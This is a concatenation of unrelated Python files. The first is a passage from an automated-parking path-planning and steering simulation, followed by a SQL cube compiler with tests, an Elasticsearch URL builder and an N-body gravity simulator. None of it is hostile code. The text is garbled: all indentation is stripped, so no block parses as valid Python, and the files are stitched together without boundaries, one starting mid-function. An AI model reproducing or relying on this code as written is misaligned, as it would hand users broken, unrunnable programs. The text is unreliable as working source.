y = a5*x^5 + a4*x^4 + a3*x^3 + a2*x^2 + a1*x + a0
y0 = a5*x0^5 + a4*x0^4 + a3*x0^3 + a2*x0^2 + a1*x0 + a0
tan(startAngle) = 5*a5*x0^4 + 4*a4*x0^3 + 3*a3*x0^2 + 2*a2*x0 + a1
y0'' = 20*a5*x0^3 + 12*a4*x0^2 + 6*a3*x0 + 2*a2//可选
y1 = a5*x1^5 + a4*x1^4 + a3*x1^3 + a2*x1^2 + a1*x1 + a0
tan(barrierAngle) = 5*a5*x1^4 + 4*a4*x1^3 + 3*a3*x1^2 + 2*a2*x1 + a1
y2 = a5*x2^5 + a4*x2^4 + a3*x2^3 + a2*x2^2 + a1*x2 + a0
tan(0) = 5*a5*x2^4 + 4*a4*x2^3 + 3*a3*x2^2 + 2*a2*x2 + a1
y2'' = 20*a5*x2^3 + 12*a4*x2^2 + 6*a3*x2 + 2*a2//可选
"""
x0 = ctrlPoint['startX']
y0 = ctrlPoint['startY']
startAngle = ctrlPoint['startAngle']
x2 = ctrlPoint['endX']
y2 = ctrlPoint['endY']
endAngle = ctrlPoint['endAngle']
if ifAvoid == 'yes':
x1 = ctrlPoint['barrierX']
y1 = ctrlPoint['barrierY']
barrierAngle = ctrlPoint['barrierAngle']
A=np.array([[pow(x0,5), pow(x0,4), pow(x0,3), pow(x0,2), x0, 1],\
[5*pow(x0,4), 4*pow(x0,3), 3*pow(x0,2), 2*x0, 1, 0],\
[pow(x1,5), pow(x1,4), pow(x1,3), pow(x1,2), x1, 1],\
[5*pow(x1,4), 4*pow(x1,3), 3*pow(x1,2), 2*x1, 1, 0],\
[pow(x2,5), pow(x2,4), pow(x2,3), pow(x2,2), x2, 1],\
[5*pow(x2,4), 4*pow(x2,3), 3*pow(x2,2), 2*x2, 1, 0]])
#[20*pow(x2,3), 12*pow(x2,2), 6*pow(x2,1), 2, 0, 0]])
B=np.array([y0, math.tan(startAngle), y1, math.tan(barrierAngle), y2, math.tan(endAngle)]) #, 0.0]) #math.tan(barrierAngle),
xlist = [x0, x1, x2]
ylist = [y0, y1, y2]
else:
#两个控制点的多项式方程组
A=np.array([[pow(x0,4), pow(x0,3), pow(x0,2), x0, 1],\
[4*pow(x0,3), 3*pow(x0,2), 2*x0, 1, 0],\
[pow(x2,4), pow(x2,3), pow(x2,2), x2, 1],\
[4*pow(x2,3), 3*pow(x2,2), 2*x2, 1, 0]])
B=np.array([y0, math.tan(startAngle), y2, math.tan(endAngle)])
xlist = [x0, x2]
ylist = [y0, y2]
X=linalg.lstsq(A,B) #解超定方程组
#X=linalg.solve(A,B) #解定方程组
'''
xx = np.arange(x2, x0, 0.01)
p1 = np.poly1d(X[0])
pp1=p1(xx)
#曲率计算
xx = np.arange(x2, x0, 0.01)
ydf1 = lambda x: 5*X[0][0]*pow(x,4) + 4*X[0][1]*pow(x,3) + 3*X[0][2]*pow(x,2) + 2*X[0][3]*x + X[0][4]
ydf2 = lambda x: 20*X[0][0]*pow(x,3) + 12*X[0][1]*pow(x,2) + 6*X[0][2]*pow(x,1) + 2*X[0][3]
k = []
for xinx in xx:
k.append(abs(ydf2(xinx) / pow( 1 + pow(ydf1(xinx),2), 1.5)))
print('k: ', k)
print('xx: ',xx)
ax.plot(xlist,ylist, ',', linewidth=1, color='m')#(xlist,ylist,color='m','.', linewidth=1, label=u'lhdata')
ax.plot(xx,pp1, '-', linewidth=1, color='b')#(xx,pp1,color='b','-', linewidth=1, label=u"lhquxian")
ax.plot(xx,k, '-', linewidth=1, color='r')#(xx,pp1,color='b','-', linewidth=1, label=u"lhquxian")
'''
return X[0]
def carMove(tyreAngle = 0, speed = 0, line = None, line1 = None, clearFlag = None):
"""
车移动状态仿真
"""
global rrp, lfp, lrp, rfp, carSize, axialDistance, hxAngle, raxPoint
cta = -tyreAngle #*0.017444444
s = -speed * 10
if cta != 0:
r1 = axialDistance/math.tan(cta)
r = r1 + carSize[1]/2
moveAngle = s / r
#中轴点为原点的转弯圆心坐标
rax0Circle = [0, -r]
#转弯圆心旋转航向角后的坐标
sinHxAngle = math.sin(hxAngle)
cosHxAngle = math.cos(hxAngle)
rax0HxCircle = [rax0Circle[0]*cosHxAngle-rax0Circle[1]*sinHxAngle, rax0Circle[0]*sinHxAngle+rax0Circle[1]*cosHxAngle]
#以转弯圆心旋转航向角后的坐标为原点坐标,并旋转cta角度
sinMoveAngle = math.sin(moveAngle)
cosMoveAngle = math.cos(moveAngle)
rax0HxCircleO = [-rax0HxCircle[0]*cosMoveAngle+rax0HxCircle[1]*sinMoveAngle, -rax0HxCircle[0]*sinMoveAngle-rax0HxCircle[1]*cosMoveAngle]
raxPoint = [rax0HxCircleO[0]+rax0HxCircle[0]+raxPoint[0], rax0HxCircleO[1]+rax0HxCircle[1]+raxPoint[1]]
hxAngle += moveAngle
sinHxAngle = math.sin(hxAngle)
cosHxAngle = math.cos(hxAngle)
rrpm = [(rrp[0]*cosHxAngle-rrp[1]*sinHxAngle + raxPoint[0]), (rrp[0]*sinHxAngle+rrp[1]*cosHxAngle + raxPoint[1])]
lrpm = [(lrp[0]*cosHxAngle-lrp[1]*sinHxAngle + raxPoint[0]), (lrp[0]*sinHxAngle+lrp[1]*cosHxAngle + raxPoint[1])]
lfpm = [(lfp[0]*cosHxAngle-lfp[1]*sinHxAngle + raxPoint[0]), (lfp[0]*sinHxAngle+lfp[1]*cosHxAngle + raxPoint[1])]
rfpm = [(rfp[0]*cosHxAngle-rfp[1]*sinHxAngle + raxPoint[0]), (rfp[0]*sinHxAngle+rfp[1]*cosHxAngle + raxPoint[1])]
XX = [rrpm[0], lrpm[0], lfpm[0], rfpm[0], rrpm[0]]
YY = [rrpm[1], lrpm[1], lfpm[1], rfpm[1], rrpm[1]]
else:
sinHxAngle = math.sin(hxAngle)
cosHxAngle = math.cos(hxAngle)
raxPoint = [raxPoint[0]-cosHxAngle*s, raxPoint[1]-sinHxAngle*s]
rrpm = [rrp[0]*cosHxAngle-rrp[1]*sinHxAngle + raxPoint[0], rrp[0]*sinHxAngle+rrp[1]*cosHxAngle + raxPoint[1]]
lrpm = [lrp[0]*cosHxAngle-lrp[1]*sinHxAngle + raxPoint[0], lrp[0]*sinHxAngle+lrp[1]*cosHxAngle + raxPoint[1]]
lfpm = [lfp[0]*cosHxAngle-lfp[1]*sinHxAngle + raxPoint[0], lfp[0]*sinHxAngle+lfp[1]*cosHxAngle + raxPoint[1]]
rfpm = [rfp[0]*cosHxAngle-rfp[1]*sinHxAngle + raxPoint[0], rfp[0]*sinHxAngle+rfp[1]*cosHxAngle + raxPoint[1]]
XX = [rrpm[0], lrpm[0], lfpm[0], rfpm[0], rrpm[0]]
YY = [rrpm[1], lrpm[1], lfpm[1], rfpm[1], rrpm[1]]
if not hasattr(carMove, 'raxList'):
carMove.raxList = [[],[]]
if clearFlag is False:
carMove.raxList[0].append(raxPoint[0])
carMove.raxList[1].append(raxPoint[1])
line.set_data(carMove.raxList[0],carMove.raxList[1])
line1.set_data(XX,YY)
else:
carMove.raxList = [[],[]]
carMove.raxList[0].append(raxPoint[0])
carMove.raxList[1].append(raxPoint[1])
#ax.plot(raxPoint[0],raxPoint[1],color='m',linestyle='',marker='o')
return s
def notTimeCtrl(thetar,theta, yr, y, curvature):
"""
基于非时间参考的路径跟踪控制
"""
k1 = 20 #200 #180
k2 = 10 #100 #160
maxAngle = 0.698131689
expression1 = axialDistance*pow(math.cos(theta), 3)
expression2 = k1*(yr-y)-k2*(math.tan(thetar)-math.tan(theta))#倒车用-k2 前进用+k2
expression3 = (math.cos(thetar)**2)*math.cos(theta)
outCtrl = expression1 * (expression2 + curvature/expression3)
if outCtrl > maxAngle:
outCtrl = maxAngle
elif outCtrl < -maxAngle:
outCtrl = -maxAngle
'''
if not hasattr(notTimeCtrl, 'maxK'):
notTimeCtrl.maxK = 0
if notTimeCtrl.maxK < abs(curvature):
notTimeCtrl.maxK = abs(curvature)
print('maxK: ', notTimeCtrl.maxK)
'''
print('outCtrl: ', outCtrl)
return outCtrl
def pointXz(param, xzAlg):
cosVal = math.cos(xzAlg)
sinVal = math.sin(xzAlg)
paramTmp = copy.deepcopy(param)
paramTmp['startX'] = param['startX']*cosVal - param['startY']*sinVal
paramTmp['startY'] = param['startX']*sinVal + param['startY']*cosVal
paramTmp['startAngle'] += xzAlg
paramTmp['barrierX'] = param['barrierX']*cosVal - param['barrierY']*sinVal
paramTmp['barrierY'] = param['barrierX']*sinVal + param['barrierY']*cosVal
paramTmp['barrierAngle'] += xzAlg
paramTmp['endX'] = param['endX']*cosVal - param['endY']*sinVal
paramTmp['endY'] = param['endX']*sinVal + param['endY']*cosVal
paramTmp['endAngle'] += xzAlg
return paramTmp
def mulPointCtrl(theta, thetaq, x, xq, y, yq, flag):
"""
多点控制算法
"""
k3 = 20
k4 = 10
maxAngle = 0.698131689
#xe = (x - xq) * math.cos(thetaq) + (y - yq) * math.sin(thetaq)
ye = (y - yq) * math.cos(thetaq) - (x - xq) * math.sin(thetaq)
thetae = theta - thetaq
expression1 = pow(math.cos(thetae),3)*axialDistance
if flag is True:
expression2 = -k3*ye - k4*math.tan(thetae)
else:
expression2 = -k3*ye + k4*math.tan(thetae)
outCtrl = math.atan(expression1 * expression2)
if outCtrl > maxAngle:
outCtrl = maxAngle
elif outCtrl < -maxAngle:
outCtrl = -maxAngle
return outCtrl
def apaTest(adaptationParam, mvSpeed, sleepFlag, ctrlFlag):
"""
水平泊车位测试
adaptationParam = startP, p1, xlp,
"""
global hxAngle, raxPoint, safeDistance, rearLen, stopFlag
#pdb.set_trace() #debug调试
startInfo = adaptationParam[0]
endInfo = adaptationParam[1]
lineTmp = adaptationParam[2]
lineTmp1 = adaptationParam[3]
lineTmp2 = adaptationParam[4]
if ctrlFlag is True:
p1 = adaptationParam[5]
xlp = adaptationParam[6]
xlp2 = adaptationParam[7]
outCtrl = 0
raxPoint[0] = startInfo[0]
raxPoint[1] = startInfo[1]
hxAngle = startInfo[2]
conDiff = 0
angleDiff = 0
mvs = 0
if ctrlFlag is False:
if mvSpeed < 0:
dirFlag = False
else:
dirFlag = True
clearFlag = True
angleChange = []
xChange = []
distance = math.sqrt((raxPoint[0]-endInfo[0])**2 + (raxPoint[1]-endInfo[1])**2)
constSpeed = mvSpeed
while 1:
if raxPoint[0] <= endInfo[0]: #mvs >= 8.0: # >= startP[0]: #
break
if stopFlag is True:
break
tmp = math.sqrt((raxPoint[0]-endInfo[0])**2 + (raxPoint[1]-endInfo[1])**2)
tmpConst = distance/3
if tmp <= tmpConst:
tmp3 = tmp/tmpConst
if tmp3 < 0.05:
constSpeed = 0.05*mvSpeed
else:
constSpeed = tmp3*mvSpeed
if ctrlFlag is True:
curY = p1(raxPoint[0])
#航向角误差
curAngle = math.atan(xlp(raxPoint[0]))
ydf1 = xlp(raxPoint[0])
ydf2 = xlp2(raxPoint[0])
#当前理想路径的曲率
k = ydf2 / pow(1 + pow(ydf1,2), 1.5)
outCtrl = notTimeCtrl(curAngle, hxAngle, curY, raxPoint[1], k)
if not hasattr(apaTest, 'maxK'):
apaTest.maxK = [0,0]
if apaTest.maxK[0] < abs(k):
apaTest.maxK = [abs(k), raxPoint[0]]
print('maxK: ', apaTest.maxK)
else:
outCtrl = mulPointCtrl(hxAngle, endInfo[2], raxPoint[0], endInfo[0], raxPoint[1], endInfo[1], dirFlag)
xChange.append(raxPoint[0])
angleChange.append(outCtrl)
lineTmp2.set_data(xChange,angleChange)
mvs += abs(carMove(tyreAngle = outCtrl, speed = constSpeed, line = lineTmp, line1 = lineTmp1, clearFlag = clearFlag))#-0.000833333
clearFlag = False
plt.draw()
#pdb.set_trace() #debug调试
if sleepFlag is True:
time.sleep(0.001)
return conDiff, angleDiff
def ycBegin(params, ax, ax1):
'''
遗传测试开始
'''
global safeDistance,rearLen
#初始化图表
line, = ax1.plot([], [], '-', linewidth=1, color='r')
line1, = ax1.plot([], [], '-', linewidth=1, color='g')
line2, = ax1.plot([], [], '-', linewidth=1, color='b')
line3, = ax.plot([], [], '-', linewidth=1, color='b')
#路径拟合
p1 = []
xlp = []
xlp2 = []
xzAlg = params['xzAlg'] #-0.436332306 #0.523598767
ctrlPointTmp = calContrlPoint(params)
ctrlPoint = pointXz(ctrlPointTmp, xzAlg)
ifAvoid = 'yes'
plotCoeff = solve(ctrlPoint, ifAvoid, ax1)
#多项式计算
p1.append(np.poly1d(plotCoeff))
xlp.append(lambda x: 5*plotCoeff[0]*pow(x,4) + 4*plotCoeff[1]*pow(x,3) + 3*plotCoeff[2]*pow(x,2) + 2*plotCoeff[3]*x + plotCoeff[4])
xlp2.append(lambda x: 20*plotCoeff[0]*pow(x,3) + 12*plotCoeff[1]*pow(x,2) + 6*plotCoeff[2]*x + 2*plotCoeff[3])
startInfo = [ctrlPoint['startX'], ctrlPoint['startY'], ctrlPoint['startAngle']]
endInfo = [ctrlPoint['endX'], ctrlPoint['endY'], ctrlPoint['endAngle']]
if params['ctrlType'] is False:
xx = np.arange(ctrlPoint['endX'], ctrlPoint['startX'], 0.01)
pp1=p1[0](xx)
drawP = [[ctrlPoint['startX'], ctrlPoint['barrierX'], ctrlPoint['endX']], [ctrlPoint['startY'], ctrlPoint['barrierY'], ctrlPoint['endY']]]
ax1.plot(drawP[0],drawP[1],color='b',linestyle='',marker='.',label=u'lhdata')
line2.set_data(xx,pp1)
apaTest((startInfo, endInfo, line, line1, line3, p1[0], xlp[0], xlp2[0]), params['carSpeed'], True, True)
else:
drawP = [[startInfo[0], endInfo[0]], [startInfo[1], endInfo[1]]]
ax1.plot(drawP[0],drawP[1],color='b',linestyle='',marker='.',label=u'lhdata')
apaTest((startInfo, endInfo, line, line1, line3), params['carSpeed'], True, False)
def main(params):
global stopFlag
fig = plt.figure(figsize = [20,8])
ax = fig.add_subplot(1,2,1,xlim=(0, 10), ylim=(-1, 1))
ax.set_xticks(np.arange(0, 10, 1))
ax.set_yticks(np.arange(-1, 1, 0.1))
ax1 = fig.add_subplot(1,2,2,xlim=(0, 10), ylim=(-5, 5))
ax1.set_xticks(np.arange(0, 10, 1))
ax1.set_yticks(np.arange(-5, 5, 1))
ax.grid(True)
ax1.grid(True)
t = Thread(target = ycBegin, args=(params, ax, ax1))
t.start()
plt.show()
stopFlag = True
if __name__ == '__main__':
'''
#多点控制
params = {
'parkL': 7.5,
'parkW': 3,
'endX': 7.5, #6.5, #7.5,
'endY': 5.4, #1.6, #1.0,
'endAngle': 1.5707963, #0.0,
'barrierX': 2.9,
'barrierY': -1,
'barrierAngle': 0.43633,
'startX':7.1,#1.5,
'startY':1.4,#-4.0,
'startAngle':1.5707963, #1.221730456
'xzAlg':0.0,
'carSpeed':-0.001388889, #5km/h
'ctrlType':True
}
'''
#侧方位停车
params = {
'parkL': 7.5,
'parkW': 3,
'startX': 8.5, #6.5, #7.5,
'startY': 1.4, #1.6, #1.0,
'startAngle': 0.0, #0.0,
'barrierX': 2.9,
'barrierY':-1,
'barrierAngle': 0.43633,
'endX':1.2,#1.5,
'endY':-1.5,#-4.0,
'endAngle':0, #1.221730456
'xzAlg':0.0,
'carSpeed':-0.001388889, #5km/h
'ctrlType':False
}
'''
#垂直泊车
params = {
'parkL': 7.5,
'parkW': 3,
'startX': 8.5, #7.5,
'startY': 2.0, #1.0,
'startAngle': 0.0, #0.0,
'barrierX': 5.5,
'barrierY': 0.4,
'barrierAngle': 0.8, #1.221730456,
'endX':4,#1.5,
'endY':-6,#-4.0,
'endAngle':1.5707963, #1.221730456
'xzAlg':-0.436332306, #旋转一定角度,避免计算tan时异常
'carSpeed':-0.001388889, #5km/h
'ctrlType':False
}
'''
'''
#斜方位泊车
params = {
'parkL': 7.5,
'parkW': 3,
'startX': 8.5, #7.5,
'startY': 1.0, #1.0,
'startAngle': 0.0, #0.0,
'barrierX': 5.5,
'barrierY': -0.2,
'barrierAngle': 0.8, #1.221730456,
'endX':3,#1.5,
'endY':-5,#-4.0,
'endAngle':1.221730456, #1.221730456
'xzAlg':-0.0, #旋转一定角度,避免计算tan时异常
'carSpeed':-0.001388889, #5km/h
'ctrlType':False
}
'''
main(params)
|
import json
import logging
from pathlib import Path
from textwrap import dedent
import chevron
import yaml
import users
from spec import Cube, Query, MeasureType, Spec
class CubeCompiler:
def __init__(self, name: str, cube: Cube):
self.name = name
self.cube = cube
def compile(self, query: Query):
measure_columns = []
dimension_columns = []
for name in query.measures:
sql = self.compile_measure(self.cube.measures[name])
sql = f'{sql} {self.name}_{name}'
measure_columns.append(sql)
for name in query.dimensions:
sql = self.compile_dimension(self.cube.dimensions[name])
sql = f'{sql} {self.name}_{name}'
dimension_columns.append(sql)
return dedent(f'''\
SELECT
{", ".join(dimension_columns)},
{", ".join(measure_columns)}
FROM ({self.cube.sql}) AS {self.name}
GROUP BY {", ".join([str(i) for i, _ in enumerate(dimension_columns)])}
''')
def compile_measure(self, measure, depth=3):
sql = self.render(measure.sql, depth)
if measure.filters:
filters = [self.render(filter.sql, depth) for filter in measure.filters]
sql = f'CASE WHEN ({" AND ".join(filters)}) THEN {sql} END'
match measure.type:
case MeasureType.COUNT:
sql = f'count({sql})'
case MeasureType.NUMBER:
pass
return sql
def compile_dimension(self, dimension, depth=3):
sql = self.render(dimension.sql, depth)
return sql
def render(self, template: str, depth: int):
if depth == 0:
return 'recursion depth exceeded'
data = {
'CUBE': self.name
}
for name, measure in self.cube.measures.items():
data[name] = self.compile_measure(measure, depth - 1)
return chevron.render(template, data)
class SpecCompiler:
def __init__(self, spec: Spec):
self.spec = spec
def compile(self, query: Query):
cube = self.spec[query.cube]
return CubeCompiler(query.cube.lower(), cube).compile(query)
def test_users():
# https://cube.dev/docs/schema/getting-started
dict0 = {name: cube.dict(exclude_unset=True) for name, cube in users.spec.items()}
json0 = json.dumps(dict0, indent=2)
print(json0)
yaml0 = yaml.dump(dict0, indent=2)
print(yaml0)
assert json0 == Path('users.json').read_text()
compiler = SpecCompiler(users.spec)
sql0 = compiler.compile(Query(
cube='Users',
measures=['count'],
dimensions=['city', 'companyName'],
))
print(sql0)
assert sql0 == dedent('''\
SELECT
users.city users_city, users.company_name users_companyName,
count(users.id) users_count
FROM (SELECT * FROM users) AS users
GROUP BY 0, 1
''')
sql1 = compiler.compile(Query(
cube='Users',
measures=['payingCount'],
dimensions=['city'],
))
print(sql1)
assert sql1 == dedent('''\
SELECT
users.city users_city,
count(CASE WHEN (users.paying = true) THEN users.id END) users_payingCount
FROM (SELECT * FROM users) AS users
GROUP BY 0
''')
sql2 = compiler.compile(Query(
cube='Users',
measures=['payingPercentage'],
dimensions=['city'],
))
print(sql2)
assert sql2 == dedent('''\
SELECT
users.city users_city,
100.0 * count(CASE WHEN (users.paying = true) THEN users.id END) / count(users.id) users_payingPercentage
FROM (SELECT * FROM users) AS users
GROUP BY 0
''')
def test_yaml():
users_dict = yaml.safe_load(Path('users.short.yaml').read_text())
users = {name: Cube(**spec) for name, spec in users_dict.items()}
print(json.dumps({name: cube.dict() for name, cube in users.items()}, indent=2))
|
"""url builder"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from es_downloader.config import IMAGO_DOC_URL, \
IMAGO_LIVE_VIDEO_URL, \
DOWNLOAD_TYPE_DOC, DOWNLOAD_TYPE_LIVE_IMG, \
DOWNLOAD_TYPE_LIVE_VID, IMAGO_LIVE_PHOTOS_URL, \
IMAGO_DOC_URL_METADATA, IMAGO_LIVE_PHOTOS_URL_METADATA, \
IMAGO_LIVE_VIDEO_URL_METADATA, MEDIA_PROVIDER_DOC_URL, \
MEDIA_PROVIDER_LIVE_PHOTOS_URL, MEDIA_PROVIDER_LIVE_VIDEO_URL
from es_downloader.exception import ElasticSearchDownloader
from es_downloader.utils import find_item_dict
class UrlBuilder(object):
"""UrlBuilder class"""
def __init__(self, download_type, index=None, imago_dev=False,
media_provider = False, dotted_path=None,
key=None, metadata_url=False):
self.index = index
self.download_type = download_type
self.imago_dev = imago_dev
self.media_provider = media_provider
self.dotted_path = dotted_path
self.key = key
self.metadata_url = metadata_url # If True, downloads Image metadata
def build_urls_no_query(self, ids):
"""build urls
:return: urls
"""
url_template = self._get_url_template()
ids_urls = dict()
for _id in ids:
url = url_template.format(id=_id)
ids_urls[_id] = url
return ids_urls
def build_urls_with_query(self, query_results):
"""build urls
:param query_results: query results
:return: urls
"""
url_template = self._get_url_template()
ids = self._get_ids(query_results)
ids_urls = dict()
for _id in ids:
url = url_template.format(id=_id)
ids_urls[_id] = url
return ids_urls
def _get_url_template(self):
"""get url template
:return: imago url template
"""
if self.media_provider:
if self.download_type == DOWNLOAD_TYPE_DOC:
source_url = MEDIA_PROVIDER_DOC_URL
elif self.download_type == DOWNLOAD_TYPE_LIVE_IMG:
source_url = MEDIA_PROVIDER_LIVE_PHOTOS_URL
elif self.download_type == DOWNLOAD_TYPE_LIVE_VID:
source_url = MEDIA_PROVIDER_LIVE_VIDEO_URL
else:
if self.download_type == DOWNLOAD_TYPE_DOC:
if self.metadata_url:
imago_url = IMAGO_DOC_URL_METADATA
else:
imago_url = IMAGO_DOC_URL
elif self.download_type == DOWNLOAD_TYPE_LIVE_IMG:
if self.metadata_url:
imago_url = IMAGO_LIVE_PHOTOS_URL_METADATA
else:
imago_url = IMAGO_LIVE_PHOTOS_URL
elif self.download_type == DOWNLOAD_TYPE_LIVE_VID:
if self.metadata_url:
imago_url = IMAGO_LIVE_VIDEO_URL_METADATA
else:
imago_url = IMAGO_LIVE_VIDEO_URL
else:
raise ElasticSearchDownloader('Unsupported download type')
if self.imago_dev:
source_url = imago_url.format(imago='imago-dev')
else:
source_url = imago_url.format(imago='imago')
return source_url
def _get_ids(self, query_results):
"""get a list of documents/photos/videos
:param query_results: results of query
:return: list of ids
"""
doc_ids = list()
# IMPORT: For backward compatibility we keep this if
# should be deprecated in future
if self.key is None:
if self.download_type == DOWNLOAD_TYPE_DOC:
if self.index.startswith('platform'):
self.dotted_path = 'documents_data'
self.key = 'document_id'
else:
self.dotted_path = None
self.key = 'document_id'
elif self.download_type == DOWNLOAD_TYPE_LIVE_IMG and \
self.index.startswith('platform'):
self.dotted_path = 'live_photos_data'
self.key = 'live_photo_id'
elif self.download_type == DOWNLOAD_TYPE_LIVE_VID and \
self.index.startswith('platform'):
self.dotted_path = 'live_videos_data'
self.key = 'live_video_id'
if self.key is None:
raise ElasticSearchDownloader('Please provide dotted path and key!')
for result in query_results:
res_dict, self.key = find_item_dict(result, self.dotted_path, self.key)
if isinstance(res_dict, list):
[doc_ids.append(item.get(self.key)) for item in res_dict if self.key in item]
else:
if res_dict.get(self.key):
doc_ids.append(int(float(res_dict.get(self.key))))
return doc_ids
|
<gh_stars>0
# requires numpy, tested on python 2.7
from __future__ import print_function
import cmath
import csv
import math
import random
import numpy as np
'''this module provides the classes to simulate a set of bodies subject to gravity.
All calculations are made in the plan, and positions are coded with complex number
to enable simple numpy calculations.
http://www.artcompsci.org/kali/vol/two_body_problem_2/ch11.html
'''
G = 6.6742E-11
COLL_TIME_MULTIPLIER = 0.01
VECTORTYPE = np.complex128
def vector(point):
"""helper to instantiate a point. In this implementation, converts
a tuple to a complex"""
if isinstance(point, complex):
return point
x, y = point
return VECTORTYPE(x + 1j * y)
def inner(a, b):
"""inner product ax*b.x+a.y*b.y"""
return a * np.conj(b)
def fformat(f):
a = abs(f)
if a > 10000 or a < 0.1:
return '%.2g' % f
if a > 100:
return '%.0f' % f
return '%.2f' % f
def cformat(c):
return '[%s,%s]' % (fformat(c.real), fformat(c.imag))
class NBodySystem(object):
"""base implementation of N body problem with leadfrog integration
in the plan (only x,y). Points are complex values."""
def __init__(self, r, v, m, coll_time_multiplier):
'''r: vector of position of the bodies at t=0, complex in m
v: velocity, complex in (m/s)
m: mass (kg)
coll_time_multiplier: multiplier to the time step, typically 0.01
All vectors of the same sizes.
'''
self.r = r
self.v = v
self.m = m
self.N = len(m)
self.opt_id = np.identity(self.N)
self.opt_gmm = -G * np.multiply.outer(self.m, self.m)
self.post_set()
self.a, self.jk = self.acc_and_jerk(self.r, self.v)
self.coll_time_multiplier = coll_time_multiplier
# not tested yet.
def add_body(self, r, v, m):
self.r = np.append(self.r, r)
self.v = np.append(self.v, v)
self.m = np.append(self.m, m)
self.N = len(m)
self.opt_id = np.identity(self.N)
self.opt_gmm = -G * np.multiply.outer(self.m, self.m)
self.post_set()
self.a, self.jk = self.acc_and_jerk(self.r, self.v)
# hook to add post calculation. not used anymore
def post_set(self):
pass
def acc_and_jerk(self, r, v):
'''calculates the acceleration and jerk from positions and
velocity of the bodies. Jerk is da/dt.'''
rji = np.add.outer(r, -r) # matrix of the relative positions
vji = np.add.outer(v, -v) # matrix of the relative velocitys
r1 = np.absolute(rji) # matrix of distances
r2 = r1 * r1
r3 = r1 * r2
am = rji / r3 * self.m
np.putmask(am, self.opt_id, 0.)
a = -G * np.add.reduce(am, 1)
jkm = -G * self.m / r3 * (vji - 3 * rji * inner(rji, vji) / r2)
np.putmask(jkm, self.opt_id, 0.)
jk = np.add.reduce(jkm, 1)
return a, jk
def step(self, t, dt):
'''applies one step: calculates acceleration and jerk, then
applies them to position and velocity'''
old_r = self.r
old_v = self.v
old_a = self.a
old_jk = self.jk
# predictor
dt2 = dt * dt
r = self.r + self.v * dt + 0.5 * self.a * dt2 + self.jk * dt2 * dt / 6.
v = self.v + self.a * dt + 0.5 * self.jk * dt2
# applies with 2nd order
self.a, self.jk = self.acc_and_jerk(r, v)
self.v = old_v + (old_a + self.a) * (dt * .5) + (old_jk - self.jk) * dt2 / 12
self.r = old_r + (old_v + self.v) * (dt * .5) + (old_a - self.a) * dt2 / 12
self.post_set()
def forward_fixed(self, starttime, endtime, dt=-1, steps=-1):
'''moves from starttime to endtime.'''
dT = float(endtime - starttime)
dt = min(dt, dT)
if steps == -1:
truedt = dT / int(dT / dt)
steps = int(dT / truedt + 0.5)
else:
truedt = dT / float(steps)
for i in range(steps):
self.step(starttime, truedt)
starttime += truedt
return steps, starttime
def collision_time(self):
'''Returns the min of (ri/vi), which is used to estimate the next dt'''
# calculates the collision time -> review next dt
rji = np.add.outer(self.r, -self.r) # matrix of the relative positions
vji = np.add.outer(self.v, -self.v) # matrix of the relative velocitys
v1 = np.absolute(vji)
sel = np.nonzero(v1)
return np.min(np.nan_to_num(np.absolute(rji)[sel] / v1[sel]))
def energy(self):
'''calculates the total energy (potential and kinetic) of the
system'''
rji = np.add.outer(self.r, -self.r) # matrix of the relative positions
r = np.absolute(rji)
epotm = self.opt_gmm / r
np.putmask(epotm, self.opt_id, 0.)
epot = -0.5 * np.sum(epotm)
ekin = 0.5 * np.add.reduce(self.m * inner(self.v, self.v))
return (ekin + epot).real
def barycenter(self):
return self.r * self.m / np.sum(self.m)
def speed_qty(self):
return np.sum(self.m * self.v)
def set_zero_speed_qty(self):
self.v -= self.speed_qty() / np.sum(self.m) # initialize total speed qty
class NBodyCommandSystem(NBodySystem):
'''a n body system where we can apply a command'''
def __init__(self, r, v, m, radius, coll_time_multiplier):
self.acc_command = np.zeros(len(r), VECTORTYPE)
self.radius = radius
NBodySystem.__init__(self, r, v, m, coll_time_multiplier)
self.sumradius = np.add.outer(self.radius, self.radius)
np.putmask(self.sumradius, self.opt_id, 0) # otherwise will collide planets with themselves
def acc_and_jerk(self, r, v):
a, jk = NBodySystem.acc_and_jerk(self, r, v)
a += self.acc_command
return a, jk
def post_step(self, dt):
pass
def step(self, t, dt):
NBodySystem.step(self, t, dt)
self.post_step(dt)
def check_collide(self):
'''checks if the distance between 2 bodies is smaller than the
sum of their radiuses. This does not take into account
motion, but with the collision_time this should not be a
problem'''
# self.sumradius=abs(np.add.outer(self.radius,self.radius))
# np.putmask(self.sumradius,self.opt_id,0) #otherwise will collide planets with themselves
rji = np.add.outer(self.r, -self.r) # matrix of the relative positions
distmatrix = abs(rji) - self.sumradius
result = []
close_bodies = distmatrix < 0
if np.sometrue(close_bodies):
vji = np.add.outer(self.v, -self.v) # matrix of the relative velocitys
# they are close and going towards each other
towards = -inner(vji, rji)
collision = np.logical_and(close_bodies, towards > 0)
if np.any(collision):
return [(i, j, towards[i, j]) for i, j in zip(*np.nonzero(collision)) if i < j]
return []
def closest(self, idx, ignorelist=()):
'''gets the closest body from body (indexes in the list)'''
ignore = set(ignorelist)
order = (np.absolute(self.r - np.ones(self.r.shape) * self.r[idx]) - self.radius).argsort()
for idx in order[1:]: # first is the body itself
if idx not in ignore:
return idx
return None
def attractor(self, idx):
r = self.r - self.r[idx]
a = np.absolute(self.m / (r * r))
a[idx] = 0
return a.argmax()
class BoundSystemDescriptor(object):
def __init__(self, name):
self.name = name
def __get__(self, instance, owner=None):
return getattr(instance._system, self.name)[instance._index]
def __set__(self, instance, value):
getattr(instance._system, self.name)[instance._index] = value
class Body(object):
'''An element subject to gravitational force, this is a proxy to
the elements stored in the system. First (1) instantiate it, then
(2) use all bodies to create a system, then (3) bind all bodies to
the system with the method bind. '''
def __init__(self, position, velocity, mass):
self.initialposition = vector(position)
self.initialvelocity = vector(velocity)
self.mass = mass
self._system = None
self._index = -1
def info(self):
return "<body (%.3e,%.3e) (%.3e,%.3e) %.3e>" % (self.r.real, self.r.imag, self.v.real, self.v.imag, self.mass)
def bind(self, system, index):
'''binds this body to a system'''
self._system = system
self._index = index
@property
def idx(self):
return self._index
v = BoundSystemDescriptor('v')
a = BoundSystemDescriptor('a')
r = BoundSystemDescriptor('r')
m = BoundSystemDescriptor('m')
jk = BoundSystemDescriptor('jk')
class SpaceBody(Body):
'''a body with a radius and an atmosphere for use in NBodyCommandSystem'''
def __init__(self, name, position, velocity, mass, radius, parent, atm, **attrs):
Body.__init__(self, position, velocity, mass)
self.initialradius = radius
self.name = name
self.parent = parent
self.atm = atm
